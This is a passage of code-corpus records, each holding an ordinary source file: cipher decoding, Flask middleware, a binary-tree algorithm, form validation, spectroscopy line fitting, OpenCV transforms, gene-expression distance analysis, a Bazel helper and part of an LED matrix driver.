cipher---\\ncipher text\")\n    cipher_text = input().split()\n    cipher_text = \"\".join(cipher_text)\n    \n    print(\"transposition rule\")\n    permutation = list(map(int, input().split()))\n    dec(cipher_text, permutation)\n    \nif __name__ == \"__main__\":\n    main()\n","sub_path":"classical-cipher/transposition-cipher/dec.py","file_name":"dec.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"136324928","text":"from flask import Request, Response, Flask\n\n\nclass middleware():\n    \"\"\"\n    Simple WSGI middleware for checking if the request to the API has a valid content type.\n    \"\"\"\n\n    def __init__(self, app: Flask):\n        self.app = app.wsgi_app\n        self.content_types = app.config.get('ALLOWED_CONTENT_TYPES')\n        self.accept = ('application/json')\n\n    def _parse_content_type(self, request_content_type: any) -> str:\n        \"\"\"\n        Content-Type := type \"/\" subtype *[\";\" parameter]\n        https://tools.ietf.org/html/rfc1341\n        \"\"\"\n        parsed_content_type = ''\n\n        if isinstance(request_content_type, str):\n            parsed_content_type = request_content_type.split(';')[0] if request_content_type.find(';') != -1 else request_content_type\n\n        return parsed_content_type\n\n    def __call__(self, environ, start_response):\n        request = Request(environ)\n        is_api_request = (request.path[1:4] == 'api')\n\n        if is_api_request:\n            content_type = self._parse_content_type(request.content_type)\n            accept_mimetypes = request.accept_mimetypes.accept_json\n\n            if content_type in self.content_types or accept_mimetypes:\n                return self.app(environ, start_response)\n\n            response = Response('{\"message\": \"Content type not valid\"}', mimetype='application/json',\n                                status=400)\n            return response(environ, start_response)\n        return self.app(environ, start_response)\n","sub_path":"app/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"154912035","text":"def distance(x1, y1, x2, y2):\n    '''\n    (float, float, float, float) -> float\n\n    Calculates distance between point(x1, y1) and (x2, y2)\n    '''\n    import math\n    d = math.sqrt((x2 - x1)**2 + (y2-y1)**2)\n    return d\n\nwhile(True):\n    d = input(\"Enter float coordinates of point A(x1, y1) and B(x2 y2)): \\n\").split()\n    for el in range(len(d)):\n        try:\n            d[el] = float(d[el])\n            print(d[el])\n        except ValueError:\n            print(\"An error occurred.\")\n            break\n    else:\n        # all values parsed as floats: leave the input loop\n        break\nab = distance(*d)\nprint(ab)","sub_path":"homework08/hw08_03.py","file_name":"hw08_03.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"355383804","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nimport sys\n\nclass Solution:\n    def __init__(self):\n        self.min = -sys.maxsize-1\n        self.max = sys.maxsize\n    def largestBSTSubtree(self, root: 'TreeNode') -> 'int':\n        if not root:\n            return 0\n        \n        _, _, count = self.myLargestBSTSubtree(root)\n        return count\n    \n    def myLargestBSTSubtree(self, root):\n        if root.right and root.left:\n            llow, lhigh, lcount = self.myLargestBSTSubtree(root.left)\n            rlow, rhigh, rcount = self.myLargestBSTSubtree(root.right)\n            if llow <= lhigh < root.val < rlow <= rhigh:\n                return llow, rhigh, lcount + rcount + 1\n            else:\n                if lcount > 
rcount:\n return self.max, self.min, lcount\n else:\n return self.max, self.min, rcount\n elif not root.right and root.left:\n llow, lhigh, lcount = self.myLargestBSTSubtree(root.left)\n if llow <= lhigh < root.val:\n return llow, root.val, lcount + 1\n else:\n return self.max, self.min, lcount\n elif root.right and not root.left:\n rlow, rhigh, rcount = self.myLargestBSTSubtree(root.right)\n if root.val < rlow <= rhigh:\n return root.val, rhigh, rcount + 1\n else:\n return self.max, self.min, rcount\n else:\n return root.val, root.val, 1\n \n","sub_path":"333. Largest BST Subtree/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"159831089","text":"from wtforms import validators\nfrom wtforms import StringField\nfrom wtforms import Form\nfrom wtforms import TextAreaField\nfrom wtfnocaptcha.fields import NoCaptchaField\n\nfrom settings import RECAPTCHA_SITE_KEY\nfrom settings import RECAPTCHA_SECRET_KEY\n\n\nclass ContactForm(Form):\n email = StringField('Email Address',\n [validators.Email()])\n contact_text = TextAreaField(\n 'What the problem is?',\n [\n validators.Length(\n min=50,\n max=500,\n message=\"Please provide %(min)d - %(max)d \"\n \"characters\"),\n ]\n )\n nocaptcha = NoCaptchaField(\n public_key=RECAPTCHA_SITE_KEY,\n private_key=RECAPTCHA_SECRET_KEY,\n secure=True,\n # validator and error texts are already set in field.\n )\n","sub_path":"contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"606231163","text":"import numpy as np\nfrom oh_lines import OHLines\nfrom scipy.interpolate import interp1d\nfrom reidentify import reidentify_lines_all\n\ndef get_ref_list(ohlines, line_indices_list,\n orders_w_solution, wvl_solutions, s_list):\n ref_wvl_list = []\n ref_pixel_list = []\n for o, wvl, s in zip(orders_w_solution,\n wvl_solutions, s_list):\n if o not in line_indices_list:\n ref_wvl_list.append([])\n ref_pixel_list.append([])\n continue\n line_indices = line_indices_list[o]\n x = np.arange(len(s))\n um2pixel = interp1d(wvl, x, bounds_error=False)\n\n ref_wvl = [ohlines.um[l] for l in line_indices]\n ref_pixel = [um2pixel(w) for w in ref_wvl]\n\n nan_filter = [np.all(np.isfinite(p)) for p in ref_pixel]\n\n # there could be cases when the ref lines fall out of bounds,\n # resulting nans.\n ref_wvl_list.append([r for r, m in zip(ref_wvl, nan_filter) if m])\n ref_pixel_list.append([r for r, m in zip(ref_pixel, nan_filter) if m])\n\n return ref_wvl_list, ref_pixel_list\n\n\ndef fit_ohlines_parameters(ohlines, line_indices_list,\n orders_w_solution, wvl_solutions, s_list,\n nan_for_bad_fits=True):\n\n ref_wvl_list, ref_pixel_list = \\\n get_ref_list(ohlines, line_indices_list,\n orders_w_solution, wvl_solutions,\n s_list)\n\n fit_results = reidentify_lines_all(s_list, ref_pixel_list,\n sol_list_transform=None)\n\n\n # check fit status and replace with nan when fit is not successful.\n if nan_for_bad_fits:\n for r in fit_results:\n for r1 in r[0]:\n if r1[2] < 0:\n r1[0][:] = np.nan\n\n return ref_wvl_list, ref_pixel_list, fit_results\n\n\ndef fit_ohlines(ohlines, line_indices_list,\n orders_w_solution, wvl_solutions, s_list):\n\n ref_wvl_list, ref_pixel_list, fit_results = \\\n fit_ohlines_parameters(ohlines, line_indices_list,\n orders_w_solution,\n wvl_solutions, s_list,\n nan_for_bad_fits=False)\n\n 
fitted_positions = retrieve_positions_from_fit(fit_results)\n\n reidentified_lines = []\n for ref_wvl, positions in zip(ref_wvl_list, fitted_positions):\n reidentified_lines.append((positions,\n np.array(map(np.mean, ref_wvl))))\n\n return ref_pixel_list, reidentified_lines\n\n\ndef fit_ohlines_pixel(s_list, ref_pixel_list):\n\n fit_results = reidentify_lines_all(s_list, ref_pixel_list,\n sol_list_transform=None)\n\n # extract centroids from the fit\n fitted_positions = []\n for results_, dpix_list in fit_results:\n\n positions = [sol_[0][0] + dpix for sol_, dpix in \\\n zip(results_, dpix_list)]\n\n # reidentified_lines.append((np.concatenate(fitted_positions),\n # np.concatenate(ref_wvl)))\n\n fitted_positions.append(np.array(map(np.mean, positions)))\n\n return fitted_positions\n\n\ndef retrieve_positions_from_fit(fit_results):\n\n # extract centroids from the fit\n fitted_positions = []\n for results_, dpix_list in fit_results:\n\n positions = [sol_[0][0] + dpix for sol_, dpix in \\\n zip(results_, dpix_list)]\n\n # reidentified_lines.append((np.concatenate(fitted_positions),\n # np.concatenate(ref_wvl)))\n\n fitted_positions.append(np.array(map(np.mean, positions)))\n\n return fitted_positions\n\n\nif __name__ == \"__main__\":\n\n log_20140525 = dict(flat_off=range(64, 74),\n flat_on=range(74, 84),\n thar=range(3, 8),\n sky=[29])\n\n from igrins_log import IGRINSLog\n igrins_log = IGRINSLog(\"20140525\", log_20140525)\n\n ohlines = OHLines()\n\n igrins_orders = {}\n igrins_orders[\"H\"] = range(99, 122)\n igrins_orders[\"K\"] = range(72, 94)\n\n ref_utdate = \"20140316\"\n band = \"K\"\n\n import json\n json_name = \"ref_ohlines_indices_%s.json\" % (ref_utdate,)\n ref_ohline_indices_map = json.load(open(json_name))\n ref_ohline_indices = ref_ohline_indices_map[band]\n\n json_name = \"wvl_sol_phase0_%s_%s.json\" % (band, igrins_log.date)\n wvl_solutions = json.load(open(json_name))\n\n # load spec\n object_name = \"sky\"\n specname = \"arc_spec_%s_%s_%s.json\" % (object_name,\n band,\n igrins_log.date)\n\n import json\n s_list = json.load(open(specname))\n\n for wvl, s in zip(wvl_solutions, s_list):\n plot(wvl, s)\n\n\n from oh_lines import OHLines\n ohlines = OHLines()\n\n # from fit_gaussian import fit_gaussian_simple\n\n # Now we fit with gaussian profile for matched positions.\n\n from scipy.interpolate import interp1d\n from reidentify import reidentify_lines_all\n\n x = np.arange(2048)\n\n\n line_indices_list = [ref_ohline_indices[str(o)] for o in igrins_orders[band]]\n\n ref_pixel_list, reidentified_lines = \\\n fit_ohlines(ohlines, line_indices_list,\n wvl_solutions, s_list)\n\n\n\n ######\n\n from ecfit.ecfit import get_ordered_line_data, fit_2dspec, check_fit\n\n # d_x_wvl = {}\n # for order, z in echel.zdata.items():\n # xy_T = affine_tr.transform(np.array([z.x, z.y]).T)\n # x_T = xy_T[:,0]\n # d_x_wvl[order]=(x_T, z.wvl)\n\n reidentified_lines_map = dict(zip(igrins_orders[band], reidentified_lines))\n\n if band == \"K\":\n json_name = \"hitran_reidentified_K_%s.json\" % igrins_log.date\n r = json.load(open(json_name))\n for i, s in r.items():\n ss = reidentified_lines_map[int(i)]\n ss0 = np.concatenate([ss[0], s[\"pixel\"]])\n ss1 = np.concatenate([ss[1], s[\"wavelength\"]])\n reidentified_lines_map[int(i)] = (ss0, ss1)\n\n xl, yl, zl = get_ordered_line_data(reidentified_lines_map)\n # xl : pixel\n # yl : order\n # zl : wvl * order\n\n x_domain = [0, 2047]\n orders_band = igrins_orders[band]\n #orders = igrins_orders[band]\n y_domain = [orders_band[0]-2, 
orders_band[-1]+2]\n    x_degree, y_degree = 4, 3\n    #x_degree, y_degree = 3, 2\n    p, m = fit_2dspec(xl, yl, zl, x_degree=x_degree, y_degree=y_degree,\n                      x_domain=x_domain, y_domain=y_domain)\n\n    # filter out the line indices not well fit by the surface\n\n    keys = reidentified_lines_map.keys()\n    di_list = [len(reidentified_lines_map[k][0]) for k in keys]\n\n    endi_list = np.add.accumulate(di_list)\n\n    filter_mask = [m[endi-di:endi] for di, endi in zip(di_list, endi_list)]\n    #from itertools import compress\n    # _ = [list(compress(indices, mm)) for indices, mm \\\n    #      in zip(line_indices_list, filter_mask)]\n    # line_indices_list_filtered = _\n\n    reidentified_lines_ = [reidentified_lines_map[k] for k in keys]\n    _ = [(v[0][mm], v[1][mm]) for v, mm \\\n         in zip(reidentified_lines_, filter_mask)]\n\n    reidentified_lines_map_filtered = dict(zip(igrins_orders[band], _))\n\n\n    if 1:\n        import matplotlib.pyplot as plt\n        fig = plt.figure(figsize=(12, 7))\n        check_fit(fig, xl, yl, zl, p,\n                  orders_band,\n                  reidentified_lines_map)\n        fig.tight_layout()\n\n        fig = plt.figure(figsize=(12, 7))\n        check_fit(fig, xl[m], yl[m], zl[m], p,\n                  orders_band,\n                  reidentified_lines_map_filtered)\n        fig.tight_layout()\n","sub_path":"libs/reidentify_ohlines.py","file_name":"reidentify_ohlines.py","file_ext":"py","file_size_in_byte":7721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"360729901","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\"\"\"\n    In principle, geometric transformations of an image fall into two main kinds:\n    affine transformations based on a 2x3 matrix (translation, scaling, rotation, flipping, etc.), and perspective transformations based on a 3x3 matrix\n\"\"\"\n\n# Read the source image\nsrcImage = cv2.imread(\"./images/lenargb.bmp\", cv2.IMREAD_COLOR)\ncv2.imshow(\"0 Source Image\", srcImage)\n\n\"\"\"\n1. Affine transform - rotation cv::getRotationMatrix2D()\n\n    retval = cv.getRotationMatrix2D(center, angle, scale)\n    param 1: the rotation center of the image\n    param 2: the rotation angle (positive: counter-clockwise, negative: clockwise)\n    param 3: the scale factor; 0.5 means shrink to half size\n\"\"\"\n# Rotate the image 45 degrees clockwise and shrink it to half size\nrows, cols = srcImage.shape[:2]\n\nMatrix = cv2.getRotationMatrix2D((cols / 2, rows / 2), 45, 0.5)\nrotateImage = cv2.warpAffine(srcImage, Matrix, (cols, rows))\ncv2.imshow('1 Rotation', rotateImage)\n\n\n\"\"\"\n2. Affine transform - translation cv::warpAffine()\n\n    dst = cv.warpAffine(src, M, dsize[, dst[, flags[, borderMode[, borderValue]]]])\n\"\"\"\n# Define the translation matrix; it must be of numpy float32 type\n# Shift 100 to the right along the x axis and 50 up along the y axis\nMatrix = np.float32([[1, 0, 100], [0, 1, 50]])\n# Implement the translation with an affine warp\ntransImage = cv2.warpAffine(srcImage, Matrix, (cols, rows))\ncv2.imshow(\"2 Translation\", transImage)\n\n\n\"\"\"\n3. Affine transform - scaling cv2::resize()\n\n    dst = cv.resize(src, dsize[, dst[, fx[, fy[, interpolation]]]])\n    dsize: size of the output image. If None, it is computed as: dsize = Size(round(fx*src.cols), round(fy*src.rows))\n\"\"\"\n# Scale the image to the given width and height\nzoomImage1 = cv2.resize(srcImage, (256, 256))\n# Scale by ratio, enlarging both the x and y axes by a factor of 1.5\nzoomImage2 = cv2.resize(srcImage, None, fx=1.5, fy=1.5, interpolation = cv2.INTER_LINEAR)\ncv2.imshow(\"3-1 Zoom in\", zoomImage1), cv2.imshow(\"3-2 Zoom out\", zoomImage2)\n\n\n\"\"\"\n4. Affine transform - flipping cv::flip()\n\n    dst = cv.flip(src, flipCode[, dst])\n    flipCode = 0: vertical flip (around the x axis); flipCode > 0: horizontal flip (around the y axis); flipCode < 0: flip both horizontally and vertically.\n\"\"\"\ndstImage = cv2.flip(srcImage, 1)\ncv2.imshow(\"4 flip\", dstImage)\n\n\n\"\"\"\n5. Perspective transform: the process of projecting an image from one view plane onto another;\n    general steps of a perspective transform: read the image, get the boundary points, define the target boundary points, get the transform matrix, apply the transform;\n\n    retval = cv.getPerspectiveTransform(src, dst[, solveMethod])\n\"\"\"\nwarpImage = cv2.imread(\"images/warp.jpg\")\nwarpImage = cv2.resize(warpImage, None, fx=0.6, fy=0.6)\ncv2.imshow(\"5-1 Warp Image\", warpImage)\n\n# Coordinates of the quadrilateral vertices in the source image\nsrcPoint = np.float32([[91, 171], [742,26], [18, 1135], [825, 1220]])\n# Coordinates of the corresponding quadrilateral vertices in the target image (top-left, top-right, bottom-left, bottom-right)\ndstPoint = np.float32([[0, 0], [900, 0], [0, 1200], [900, 1200]])\n# Build the perspective transform matrix\nMatrix = cv2.getPerspectiveTransform(srcPoint, dstPoint)\n# Apply the perspective transform\ndstImage = cv2.warpPerspective(warpImage, Matrix, (960, 1280))\ndstImage = cv2.resize(dstImage, None, fx=0.6, fy=0.6)\ncv2.imshow(\"5-2 Perspective Transformation\", dstImage)\n\n\ncv2.waitKey(0)","sub_path":"practice-4/task_8.py","file_name":"task_8.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"412771789","text":"import os\nimport sys\nimport math\nimport linecache\nimport numpy as np\nimport cPickle as pickle\nfrom itertools import islice\n\nfrom Sample import *\n\nif not os.path.exists('Data.pickle'):\n    print('Data.pickle missing! Program abort.')\n    sys.exit()\nelse :\n    AllData = pickle.load(open('Data.pickle' , 'rb' ))\nif not os.path.exists('Data_avg.pickle'):\n    print('Data_avg.pickle missing! Program abort.')\n    sys.exit()\nelse :\n    Data_avg = pickle.load(open('Data_avg.pickle' , 'rb' ))\nif not os.path.exists('Data_std.pickle'):\n    print('Data_std.pickle missing! Program abort.')\n    sys.exit()\nelse :\n    Data_std = pickle.load(open('Data_std.pickle' , 'rb' ))\nif not os.path.exists('Index_Sample.pickle'):\n    print('Index_Sample.pickle missing! Program abort.')\n    sys.exit()\nelse :\n    SampleIndex = pickle.load(open('Index_Sample.pickle', 'rb'))\nif not os.path.exists('Index_Gene.pickle'):\n    print('Index_Gene.pickle missing! 
Program abort.')\n sys.exit()\nelse :\n GeneIndex = pickle.load(open('Index_Gene.pickle', 'rb'))\n\ndef AnalyticsFileCheck():\n AnalyticsFile = 'genes.fpkm_table'\n if not os.path.exists(AnalyticsFile):\n print('Can not find the file to be search.')\n sys.exit()\n else :\n FileTitle = linecache.getline(AnalyticsFile, 1).replace('\\n','').split('\\t')\n if len(FileTitle)>2 :\n print('Make sure file have only one sample.')\n else :\n SearchID = FileTitle[1]\n LineCount = 0\n FileInput = open(AnalyticsFile, 'rb')\n while True:\n buffer = FileInput.read(8192 * 1024)\n if not buffer:\n break\n LineCount += buffer.count(b'\\n')\n AnalyticsData = np.zeros((1, LineCount))\n AnalyticsGeneIndex = []\n for eachLine in islice(open(AnalyticsFile), 1, None) :\n AnalyticsGeneIndex += [eachLine.replace('\\n','').split('\\t')[0]]\n AnalyticsData = eachLine.replace('\\n','').split('\\t')[1:]\n if not GeneIndex == AnalyticsGeneIndex :\n print('INFO: ANALYTICS GENE CATALOG EXCEPTION!')\n sys.exit()\n AnalyticsData_Nor = (AnalyticsData - Data_avg) / Data_std\n\n#AnalyticsFileCheck()\n\ndef FindID(n) :\n find_flag = False \n for sample in SampleIndex :\n if n <= sample.SampleEndsIn :\n find_flag = True\n return str(sample.SampleID)\n if not find_flag :\n print('STATUS: Can not find the sample!')\n sys.exit()\n\nprint('STATUS: pre-Analytics Check Complete.')\n\nx=input(\"STATUS: Select one sample from sample set(0, \" + str(AllData.shape[0])+\"): \")\n\nprint('INFO: SampleID of input number:'+FindID(x))\n\ndef Euclidean_DM(x,y) :\n return math.sqrt(np.nansum((x - y) ** 2))\n\ndef Pearson_DM(x,y) :\n return np.nansum(x * y)/math.sqrt(np.nansum(x * x) *np.nansum(y * y))\n\ndef Spearman_DM(x,y) :\n n = x.size\n return 1 - 6*np.nansum((x - y) * (x - y))/(n ** 3 - n )\n\nDataSetSize = AllData.shape[0]\nDistance = np.zeros((DataSetSize))\nfor i in range(0,DataSetSize) :\n Distance[i]=Spearman_DM(AllData[x,:], AllData[i,:])\nAnalyticsResult = np.argsort(Distance)[::-1]\n\nOutput = []\ni = 0\nfor Result in AnalyticsResult :\n ans = str(i+1)+': '+ FindID(Result) +': '+str(Distance[Result])\n if i < 10 :\n print(ans)\n i += 1\n Output.append(ans)\nopen(r'Output.txt','w').write('\\r\\n'.join(str(num)[:-1] for num in Output))\nprint('INFO: Result saved as Output.txt.')\n\nHeatmap = np.zeros((DataSetSize,DataSetSize))\nfor x in range(0,DataSetSize) :\n for y in range(0,DataSetSize) :\n Heatmap[x, y]=Spearman_DM(AllData[x,:], AllData[y,:])\nnp.savetxt('Heatmap.txt',Heatmap,delimiter='\\t',newline='\\r\\n')\nprint('INFO: Heatmap saved.')\n","sub_path":"Local_Analytics.py","file_name":"Local_Analytics.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"241804209","text":"import numpy as np\n\nclass LateIntegrator:\n def __init__(self, omic_splits, sm_threshold, si_threshold):\n \"\"\"\n :param omic_split: a list of omic numpy datasets, each one of shape (number samples, number omic features)\n \"\"\"\n self.sm_threshold = sm_threshold\n self.si_threshold = si_threshold\n self.y_train, self.y_test = omic_splits[0][2], omic_splits[0][3]\n self.X_train_list, self.X_test_list = self.integrate_dataset(omic_splits)\n self.num_omic_datasets = len(omic_splits)\n\n\n def set_classifier(self, classifier, name):\n self.name = name\n self.classifiers = [classifier for _ in range(self.num_omic_datasets)]\n\n\n def integrate_dataset(self, omic_splits):\n X_train_list = []\n X_test_list = []\n\n for split in omic_splits:\n X_train, X_test, _, _ = 
split\n X_train_list.append(X_train)\n X_test_list.append(X_test)\n\n return X_train_list, X_test_list\n\n\n def integrate_predictions(self, probabilities):\n \"\"\"\n :param probabilities: list of probabilities on all omic datasets. Global shape is [# omic, # samples, # classes]\n :return:\n \"\"\"\n probabilities = np.transpose(probabilities, (1, 0, 2)) # each element is the matrix over which perform our computations\n preds = []\n for mat in probabilities:\n S_i = np.sum(mat, axis=0) # shape = (num_classes, )\n S_a = np.sum(S_i)\n S_m = S_i/self.num_omic_datasets\n\n if np.max(S_m) < self.sm_threshold or np.max(S_i/S_a) < self.si_threshold:\n preds.append(None) # Unknown\n\n else:\n preds.append(np.argmax(S_i) + 1) # index start from 0, classes start from 1\n\n return preds\n\n\n def compute_accuracy(self, preds, train=False):\n \"\"\"\n :param train: whether to use y_train or y_test as ground truth\n \"\"\"\n\n if train:\n ground_truth = self.y_train\n else:\n ground_truth = self.y_test\n\n # Consider None as a missed prediction\n accuracy = np.sum(ground_truth == preds) / len(ground_truth)\n\n return accuracy\n\n\n def train_eval(self):\n train_proba = []\n test_proba = []\n for clf, X_train, X_test in zip(self.classifiers, self.X_train_list, self.X_test_list):\n clf.fit(X_train, self.y_train)\n train_proba.append(clf.predict_proba(X_train))\n test_proba.append(clf.predict_proba(X_test))\n\n train_preds = self.integrate_predictions(train_proba)\n test_preds = self.integrate_predictions(test_proba)\n\n train_accuracy = self.compute_accuracy(train_preds, train=True)\n test_accuracy = self.compute_accuracy(test_preds, train=False)\n\n print(self.name + \" train accuracy: {}\".format(train_accuracy))\n print(self.name + \" test accuracy: {}\".format(test_accuracy))\n","sub_path":"Lab8/a1/late_integration.py","file_name":"late_integration.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"224652872","text":"# Copyright 2017 The Bazel Authors. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Support functions for plist-based operations.\"\"\"\n\nload(\"@build_bazel_rules_apple//apple:utils.bzl\", \"apple_action\")\n\ndef _plisttool_action(ctx, inputs, outputs, control_file, mnemonic = None):\n \"\"\"Registers an action that invokes `plisttool`.\n\n This function is a low-level helper that simply invokes `plisttool` with the\n given arguments. 
It is intended to be called by other functions that register\n actions for more specific resources, like Info.plist files or entitlements\n (which is why it is in a `plist_support.bzl` rather than\n `plist_actions.bzl`).\n\n Args:\n ctx: The Skylark context.\n inputs: Any `File`s that should be treated as inputs to the underlying\n action.\n outputs: Any `File`s that should be treated as outputs of the underlying\n action.\n control_file: The `File` containing the control struct to be passed to\n plisttool.\n mnemonic: The mnemonic to display when the action executes. Defaults to\n None.\n \"\"\"\n apple_action(\n ctx,\n inputs = inputs + [control_file],\n outputs = outputs,\n executable = ctx.executable._plisttool,\n arguments = [control_file.path],\n mnemonic = mnemonic,\n )\n\n# Define the loadable module that lists the exported symbols in this file.\nplist_support = struct(\n plisttool_action = _plisttool_action,\n)\n","sub_path":"apple/bundling/plist_support.bzl","file_name":"plist_support.bzl","file_ext":"bzl","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"8948845","text":"#! /usr/bin/env python\nimport sys\nimport numpy as np\nimport itertools as it\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom roc_model import ROCModel\nfrom heat_problem import HeatProblem\nfrom analysis_utils import (aggregate_current_vectors,\n print_current_table,\n energy_flow,\n plot_heatmap)\n\nexp_largest_mesh = 6\nprob_size = 2**exp_largest_mesh\nsource = (0, 0, 1, 1)\nsink = (prob_size-1, prob_size-1, 1, 1)\ncond_exp = -3\nconductance = 10**cond_exp\nhp = HeatProblem(prob_size, source, sink, conductance, src_val=10.)\n\nuse_cached = True\n\nfilename='tmp/bo_err_{}'\nground_truth_mesh = ROCModel(2**exp_largest_mesh)\nexp_size_range = range(2,exp_largest_mesh)\nmeshes = {exp_size:ROCModel(2**exp_size) for exp_size in exp_size_range}\n\n\ndef blue_p(exp_mesh_size):\n val = 2**(exp_mesh_size-2) # 1/4 point\n return (val,val)\n\ndef orange_p(exp_mesh_size):\n val = 3*2**(exp_mesh_size-2) # 3/4 point\n return (val,val)\n\ndef get_results(mesh, cached=False):\n import os.path\n\n mesh.load_problem(hp)\n f = filename.format(mesh.w)\n exists = os.path.exists(f+'.out')\n if cached and exists:\n print('Using cache' + f)\n mesh.init_from_cache(f)\n else:\n mesh.run_spice_solver(f)\n return mesh.final_grid\n\nbase_grid = get_results(ground_truth_mesh, cached=use_cached)\n\nblue_errs = []\norange_errs = []\nfor exp_mesh_size, mesh in meshes.items():\n print(exp_mesh_size)\n\n # grid is a numpy array\n tmp_grid = get_results(mesh, cached=use_cached)\n\n tmp_bp = blue_p(exp_mesh_size)\n tmp_op = orange_p(exp_mesh_size)\n blue_errs.append(abs(tmp_grid[tmp_bp]-base_grid[tmp_bp]))\n orange_errs.append(abs(tmp_grid[tmp_op]-base_grid[tmp_op]))\n\n\nrect = 0.1,0.2,0.8,0.7\nfig = plt.figure(figsize=(10,5))\nax = fig.add_axes(rect)\n\nsizes = [2**i for i in exp_size_range]\n\ndef custom_plot(ax, *xy):\n ax.plot(*xy, marker='o',\n markerfacecolor='none',\n markeredgewidth=2)\n\n ax.set_xlabel('Mesh Size')\n ax.set_xticks(sizes)\n ax.set_xticklabels(sizes)\n\n ax.set_ylabel('Error')\n\n ax.set_ylim((0, max([max(xy[i]) for i in range(1,len(xy),2)])*1.1))\n ax.set_xlim(0,prob_size/2+1)\n\n ax.grid(b=True, axis='x')\n ax.grid(b=True, axis='y', linestyle='dashed')\n\n ax.spines['top'].set_linewidth(1)\n ax.spines['bottom'].set_linewidth(1)\n ax.spines['left'].set_linewidth(1)\n ax.spines['right'].set_linewidth(1)\n\ncustom_plot(ax, 
sizes, blue_errs, sizes, orange_errs)\n# ax.plot(sizes, blue_errs, sizes, orange_errs)\n# ax.set_xticks(sizes)\n# ax.set_xticklabels(sizes)\n# ax.set_ylim((0, max(max(blue_errs), max(orange_errs))*1.1))\n# ax.set_xlim(0,2**(exp_largest_mesh-1)*1.1)\nplt.show()\n","sub_path":"test/scalable_mesh/accuracy/blue_orange_errs.py","file_name":"blue_orange_errs.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"329777305","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2017 Richard Hull and contributors\n# See LICENSE.rst for details.\n\n# Example usage:\n#\n# from luma.core.interface.serial import spi, noop\n# from luma.core.render import canvas\n# from luma.led_matrix.device import max7219\n#\n# serial = spi(port=0, device=0, gpio=noop())\n# device = max7219(serial, width=8, height=8)\n#\n# with canvas(device) as draw:\n# draw.rectangle(device.bounding_box, outline=\"white\", fill=\"black\")\n#\n# As soon as the with-block scope level is complete, the graphics primitives\n# will be flushed to the device.\n#\n# Creating a new canvas is effectively 'carte blanche': If you want to retain\n# an existing canvas, then make a reference like:\n#\n# c = canvas(device)\n# for X in ...:\n# with c as draw:\n# draw.rectangle(...)\n#\n# As before, as soon as the with block completes, the canvas buffer is flushed\n# to the device\n\nfrom luma.core.interface.serial import noop\nfrom luma.core.device import device\nfrom luma.core.util import deprecation\nimport luma.core.error\nimport luma.led_matrix.const\nfrom luma.led_matrix.segment_mapper import dot_muncher\n\n\n__all__ = [\"max7219\", \"ws2812\", \"neopixel\", \"apa102\"]\n\n\nclass max7219(device):\n \"\"\"\n Encapsulates the serial interface to a series of 8x8 LED matrixes\n daisychained together with MAX7219 chips. On creation, an initialization\n sequence is pumped to the display to properly configure it. Further control\n commands can then be called to affect the brightness and other settings.\n \"\"\"\n def __init__(self, serial_interface=None, width=8, height=8, cascaded=None, rotate=0,\n block_orientation=0, **kwargs):\n super(max7219, self).__init__(luma.led_matrix.const.max7219, serial_interface)\n\n # Derive (override) the width and height if a cascaded param supplied\n if cascaded is not None:\n width = cascaded * 8\n height = 8\n\n self.capabilities(width, height, rotate)\n self.segment_mapper = dot_muncher\n\n if width <= 0 or width % 8 != 0 or height <= 0 or height % 8 != 0:\n raise luma.core.error.DeviceDisplayModeError(\n \"Unsupported display mode: {0} x {1}\".format(width, height))\n\n assert block_orientation in [0, 90, -90, 180, \"horizontal\", \"vertical\"]\n if block_orientation == \"vertical\":\n msg = (\n \"WARNING! block_orientation=\\\"vertical\\\" is now deprecated and \"\n \"should be changed to block_orientation=-90 to acheive the same \"\n \"effect. Use of \\\"vertical\\\" will be removed entirely beginning \"\n \"v1.0.0\")\n deprecation(msg)\n self._correction_angle = -90\n elif block_orientation == \"horizontal\":\n msg = (\n \"WARNING! block_orientation=\\\"horizontal\\\" is now deprecated and \"\n \"should be changed to block_orientation=0 to acheive the same \"\n \"effect. 
